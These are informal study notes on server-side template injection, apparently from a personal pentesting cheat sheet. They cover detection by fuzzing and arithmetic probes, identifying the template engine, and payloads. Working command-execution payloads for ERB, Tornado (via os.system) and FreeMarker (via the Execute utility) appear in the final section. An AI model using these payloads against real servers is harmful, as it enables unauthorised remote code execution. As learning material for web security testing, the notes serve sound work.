[SERVER-SIDE TEMPLATE INJECTION]
GENERAL INFORMATION
first clue is XSS, normally after finding XSS no deep testing is performed and sometimes missed during black box engagements. one good way to differentiate if SSTI is possible is to attempt normal/common operations, like sum, multiplication, etc. not only XSS can lead to SSTI, also XXE. typically arises through developers intentionally letting users submit or edit templates - some template engines offer a secure mode for this express purpose. it may occur as a Local File Include (LFI) variant, exploitable through classic LFI techniques such as code embedded in log files, session files, or /proc/self/envIDENTIFICATION
high level - find parameter that reflects - test payloads (operational) - find the template type/version - execute payloads 1. detecting template injection initial approach is to try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as ${{<%[%'"}}%\. If an exception is raised, this indicates that the injected template syntax is potentially being interpreted by the server in some way. Even if fuzzing did suggest a template injection vulnerability, you still need to identify its context in order to exploit it. for plaintext: Normal XSS attempts cannot provide evidence to SSTI, it will be needed some kind of operations, like {7*7}. If the result is 49, it means the mathematical operation is evaluated on server side, confirming a potential SSTI vulnerability. for codecontext: it will render using variable/parameter, so one way to test if the template used is vulnerable is to attempt injecting HTML code to a non-XSS vulnerable parameter, if it is reflected, it's could means the parameters are vulnerable to SSTI. SAMPLE: http://vulnerable-website.com/?greeting=data.username<tag> | http://vulnerable-website.com/?greeting=data.username}}<tag> 2. detect template engine in use [it differs] A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines. check this site, https://portswigger.net/web-security/server-side-template-injection 3. read the documentationTEMPLATES ENGINES
>> ERB it is pretty important to check the documentation, there you can find the different methods or functions that you can call to make the template execute operations. common way to test, <%= 7*7 %> common way to execute arbitrary commands, <%= system("cat /home/user/mo.txt") %> >> TORNADO template expressions are surrounded by {}, a simple way to test it is using the following: }}{{7*7}} sometimes it is important to make post, or use the site to validate the user and information is valid. --> execute python in tornado ? how to do that ? the "OS" module can be used to run/execute python on a TORNADO template. check the following code to run python. you can mix commands to get the desired results, importing the OS module bring the chance to use or call OS commands in general. {% import os %}{{os.system('cat /home/user/mo.txt') >> FREEMARKER code execution: <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ${"freemarker.template.utility.Execute"?new()("id")} #{"freemarker.template.utility.Execute"?new()("id")} [="freemarker.template.utility.Execute"?new()("id")]
©® - Since 2023